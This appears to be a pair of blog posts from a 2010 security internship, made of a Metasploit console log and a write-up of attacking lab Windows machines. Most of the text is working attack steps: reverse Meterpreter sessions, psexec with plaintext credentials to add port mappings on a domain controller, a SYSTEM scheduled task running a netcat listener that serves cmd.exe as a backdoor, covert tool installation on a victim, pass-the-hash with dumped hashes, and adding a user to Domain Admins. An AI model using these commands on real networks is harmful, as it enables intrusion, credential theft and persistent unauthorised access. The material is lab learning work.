C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC 192.168.1.188 9999 192.168.2.50 9999

192.168.1.188 is not an acceptable value for proto.
netsh exited on srv-DC with error code 1.

/* Oops, missed a necessary argument. Added it and tried again but things got screwed for unknown reasons and I had to exit and rerun the exploit to start a new session. */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

Terminate channel 1? [y/N]
n

Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter >
meterpreter >
meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > background
msf exploit(handler) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
2 meterpreter NT AUTHORITY\SYSTEM @ WKS-XP1 192.168.1.188:31337 -> 192.168.1.250:62571

msf exploit(handler) > sessions -i 1
[-] Invalid session identifier: 1
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.
meterpreter > exit

[*] Meterpreter session 2 closed. Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 3 opened (192.168.1.188:31337 -> 192.168.1.250:61734)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 3
[-] The 'stdapi' extension has already been loaded.

meterpreter > pwd
C:\WINDOWS\TEMP
meterpreter > shell
Process 308 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 192.168.1.188 9999 192.168.2.50 9999

The static port mapping from 192.168.1.188/9999 to 192.168.2.50/9999 requires 192.168.1.188 to be part of a configured address range. To define a static port mapping on this interface's assigned IP address, please specify 0.0.0.0 as the public address for the mapping.

netsh exited on srv-DC with error code 1.

/* I was trying to limit access to only wks-Matriux. It didn't work and it was too late at night to understand why, so I just set to 0.0.0.0 */

C:\Program Files\ps>psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999

psexec \\srv-DC -s -u TEST\usr1 -p usr1 netsh routing ip nat add portmapping OutsideNIC tcp 0.0.0.0 9999 192.168.2.50 9999

netsh exited on srv-DC with error code 0.

/* OK, I think I now have portmapping and a firewall rule in place :) */

C:\Program Files\ps>netsh
exit
exit

/* Hanging screwiness follows, had to terminate and re-establish session */

Terminate channel 1? [y/N] [-] Error running command shell: SignalException SIGUSR1
meterpreter > it
[-] Unknown command: it.
meterpreter > exit

[*] Meterpreter session 3 closed. Reason: User exit
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.188:31337
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.250
[*] Meterpreter session 4 opened (192.168.1.188:31337 -> 192.168.1.250:61737)
[*] AutoAddRoute: Routing new subnet 192.168.2.0/255.255.255.0 through session 4
[-] The 'stdapi' extension has already been loaded.

meterpreter > shell
Process 1008 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\TEMP>cd c:\program files\ps
cd c:\program files\ps

C:\Program Files\ps>netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
netsh firewall add portopening protocol=tcp port=9999 name="jah-netcat" profile=ALL
Ok.

/* This is adding the firewall opening to the local workstation. Netsh is different on XP */

C:\Program Files\ps>schtasks /?
schtasks /?

SCHTASKS /parameter [arguments]

Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.

Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.

Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?

C:\Program Files\ps>schtasks /create /?
schtasks /create /?

SCHTASKS /Create [/S system [/U username [/P password]]]
[/RU username [/RP password]] /SC schedule [/MO modifier] [/D day]
[/I idletime] /TN taskname /TR taskrun [/ST starttime] [/M months]
[/SD startdate] [/ED enddate]

Description:
Enables an administrator to create scheduled tasks on a local or
remote systems.

Parameter List:
/S system Specifies the remote system to
connect to. If omitted the system
parameter defaults to the local
system.

/U username Specifies the user context under
which the command should execute.

/P password Specifies the password for the given
user context.

/RU username Specifies the user account (user
context) under which the task runs.
For the system account, valid values
are "", "NT AUTHORITY\SYSTEM" or
"SYSTEM".

/RP password Specifies the password for the user.
To prompt for the password, the value
must be either "*" or none.
Password will not effect for the
system account.

/SC schedule Specifies the schedule frequency.
Valid schedule types: MINUTE, HOURLY,
DAILY, WEEKLY, MONTHLY, ONCE,
ONSTART, ONLOGON, ONIDLE.

/MO modifier Refines the schedule type to allow
finer control over schedule
recurrence. Valid values are listed
in the "Modifiers" section below.

/D days Specifies the day of the week to run
the task. Valid values: MON, TUE,
WED, THU, FRI, SAT, SUN and for
MONTHLY schedules 1 - 31 (days of the
month).

/M months Specifies month(s) of the year.
Defaults to the first day of the
month. Valid values: JAN, FEB, MAR,
APR, MAY, JUN, JUL, AUG, SEP, OCT,
NOV, DEC.

/I idletime Specifies the amount of idle time to
wait before running a scheduled
ONIDLE task.
Valid range: 1 - 999 minutes.

/TN taskname Specifies a name which uniquely
identifies this scheduled task.

/TR taskrun Specifies the path and file name of
the program to be run by this
scheduled task.
Example: C:\windows\system32\calc.exe

/ST starttime Specifies the time to run the task.
The time format is HH:MM:SS (24 hour
time) for example, 14:30:00 for
2:30 PM.

/SD startdate Specifies the first date on which the
task runs. The format is
"mm/dd/yyyy".

/ED enddate Specifies the last date when the task
should run. The format is
"mm/dd/yyyy".

/? Displays this help/usage.

Modifiers: Valid values for the /MO switch per schedule type:
MINUTE: 1 - 1439 minutes.
HOURLY: 1 - 23 hours.
DAILY: 1 - 365 days.
WEEKLY: weeks 1 - 52.
ONCE: No modifiers.
ONSTART: No modifiers.
ONLOGON: No modifiers.
ONIDLE: No modifiers.
MONTHLY: 1 - 12, or
FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY.

Examples:
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN rtest2 /TR calc.exe /ST 12:00:00
/SD 10/20/2001 /ED 10/20/2001 /RU runasuser /RP
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN game
/TR c:\windows\system32\freecell
SCHTASKS /Create /S system /U user /P password /RU runasuser
/RP runaspassword /SC WEEKLY /TN test1 /TR notepad.exe
SCHTASKS /Create /S system /U domain\user /P password /SC MINUTE
/MO 5 /TN test2 /TR c:\windows\system32\notepad.exe
/ST 18:30:00 /RU runasuser /RP *
SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN cell
/TR c:\windows\system32\freecell /RU runasuser

/* They don't give an example of how to pass arguments to a task or how to use a task path with spaces, thanks MS :| Experimentation is painful in the console with no tab completions. The easiest way to do this is to either use short pathnames (progra~1) or to create a batch file with your command line in it, then use the task to call run that. */

C:\Program Files\ps>schtasks /?
schtasks /?

SCHTASKS /parameter [arguments]

Description:
Enables an administrator to create, delete, query, change, run and
end scheduled tasks on a local or remote system. Replaces AT.exe.

Parameter List:
/Create Creates a new scheduled task.
/Delete Deletes the scheduled task(s).
/Query Displays all scheduled tasks.
/Change Changes the properties of scheduled task.
/Run Runs the scheduled task immediately.
/End Stops the currently running scheduled task.
/? Displays this help/usage.

Examples:
SCHTASKS
SCHTASKS /?
SCHTASKS /Run /?
SCHTASKS /End /?
SCHTASKS /Create /?
SCHTASKS /Delete /?
SCHTASKS /Query /?
SCHTASKS /Change /?

C:\Program Files\ps>schtasks /change /?
schtasks /change /?

SCHTASKS /Change [/S system [/U username [/P password]]] {[/RU runasuser]
[/RP runaspassword] [/TR taskrun]} /TN taskname

Description:
Changes the program to run, or user account and password used
by a scheduled task.

Parameter List:
/S system Specifies the remote system to connect to.

/U username Specifies the user context under
which the command should execute.

/P password Specifies the password for the given
user context.

/RU username Changes the user name (user context) under
which the scheduled task has to run.
For the system account, valid values are
"", "NT AUTHORITY\SYSTEM" or "SYSTEM".

/RP password Specifies a new password for the existing
user context or the password for a new
user account. Password will not effect for
the system account.


/TR taskrun Specifies a new program that the scheduled
task runs. Type the path and file name of
the program.

/TN taskname Specifies which scheduled task to change.

/? Displays this help/usage.

Examples:
SCHTASKS /Change /RP password /TN "Backup and Restore"
SCHTASKS /Change /TR restore.exe /TN "Start Restore"
SCHTASKS /Change /S system /U user /P password /RU newuser
/TN "Start Backup"

C:\Program Files\ps>schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"

schtasks /create /RU "SYSTEM" /SC ONLOGON /TN listen /TR "C:\Progra~1\ps\nc.exe -n -L -s 192.168.2.50 -p 9999 -e cmd.exe"

INFO: The Schedule Task "listen" will be created under user name ("NT AUTHORITY\SYSTEM").
SUCCESS: The scheduled task "listen" has successfully been created.

C:\Program Files\ps>exit
meterpreter > exit

[*] Meterpreter session 4 closed. Reason: User exit
msf exploit(handler) >

/* After all this, I had successfully set up: portmapping on srv-DC - 192.168.2.1:9999 -> 192.168.2.50:9999 firewall rule on srv-DC - allow tcp from any to any 9999 in firewall rule on wks-xp1 - allow tcp from any to any 9999 in task scheduled to run netcat (as system) at logon, listen on 9999 and provide a command shell to any connection. I tested this and can now successfully connect from outside the gateway: nc -nvv 192.168.1.250 9999 (srv-DC OutsideNIC) */
Posted by at No comments:

Sunday, April 11, 2010

SimWitty Internship: Week 13

Well, this week is going to be kind of hard to write up. There was so much going on with trying to attack the other VMs that is began to blur somewhat in my head. I tried to keep notes as much as possible but it still may seem a bit confused.

Let's see, for starters... I got wks-XP1 compromised and set up the meterpreter reverse tcp executable to try connecting back to me every 5 minutes. This worked good and gave me an easy way back in to the machine. I was then able to use the meterpreter session to install winpcap and nmap on wks-XP1.

Installing WinPcap and Nmap
The easiest way to get the right files to install for winpcap is to install it to a VM with matching OS of your target (I just used the actual VM in the case of this lab, then uninstalled it when I had what I wanted). Then create a folder to hold your files, and copy the following to your folder:
  • c:\windows\system32\Packet.dll
  • c:\windows\system32\pthreadVC.dll
  • c:\windows\system32\wpcap.dll
  • c:\windows\system32\drivers\npf.sys
If you want to install the whole thing so it can be uninstalled, also copy over the files in c:\program files\winpcap and export the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WinPcapInst so you can import it on the target. For Nmap, you want to download the zipfile they make available for Windows. Unzip the file into a subfolder with your winpcap files i.e.:
\---tools
    +---nmap
    \---winpcap

To install WinPcap, do the following:
  • Connect via meterpreter to the target (you will need admin privs)
  • Change your local working directory to where you have your winpcap files
  • Change your target working directory to C:\windows\system32 (don't forget you need double backslashes for the path in meterpreter)
  • Upload Packet.dll, pthreadVC.dll, and wpcap.dll
  • Change target working directory to C:\windows\system32\drivers
  • Upload npf.sys
  • Open a shell on the Victim
To create the service, run this command: (pay attention to weird MS space usage)
sc create npf type= kernel start= auto error= normal binpath= "c:\windows\system32\drivers\npf.sys"

To install Nmap do the following:
  • cd to c:\program files
  • mkdir nmap
  • cd nmap
  • Jump back to meterpreter prompt
  • Upload the nmap files
  • Jump back to a command shell (be sure your in the nmap directory) and execute the following:
       vcredist_x86.exe /q:a /c:"msiexec /i vcredist.msi /qn /l*v %temp%\vcredist_x86.log"
The vcredist bit is courtesy of MSDN

You should now have working copies of Nmap and WinPcap on the victim. Start WinPcap: net start npf, then check Nmap nmap --version

After installing both on wks-XP1, I ran a scan of the subnet and output to xml. I then downloaded (via meterpreter) the xml file to the attack VM. I tried importing into a new workspace in the db (figuring you have already connected to the db):
db_workspace -a nmap
db_workspace nmap
db_import_nmap_xml /path/to/xml_file
I made sure that metasploit was routing 192.168.1.0/24 thru the active session, and then tried db_autopwn but it didn't work.

Finally I decided to try using exploit/windows/smb/psexec (thank you YouTube for the Mubix Video). I had the existing meterpreter session connected back to port 31337 so I set LPORT for this instance to 31336. I used the SMBUser Administrator, SMBPass I pasted in the admin hash I got from running hashdump in the meterpreter session. I set the RHOST accordingly for each succesive attempt, starting with wks-XP2 at 192.168.2.51. This worked fine, and allowed me to use hashdump on each machine to get the password hashes. Unlike the video though, this would NOT work against the Domain Controller (srv-DC).

I tried numerous times with different names and hashes against srv-DC. All returned either STATUS_LOGON_FAILURE or STATUS_ACCESS_DENIED. I am not exactly sure why this is. In the time I had to investigate, I found a link talking about NullSessionPipes that may have something to do with it. I never was successful running this exploit against the DC, but I was able to add a user to the Domain Admins group, I don't know exactly why one worked and the other didn't. The syntax for the incognito command add_group_user is a little weird, it is add_group_user -h DC>

Getting into the Domain Controller needs more investigation and I think I will stretch it into next week a little. I hope this didn't come out as too much of a jumble, it sure felt like one.
Posted by at No comments:
Subscribe to: Posts (Atom)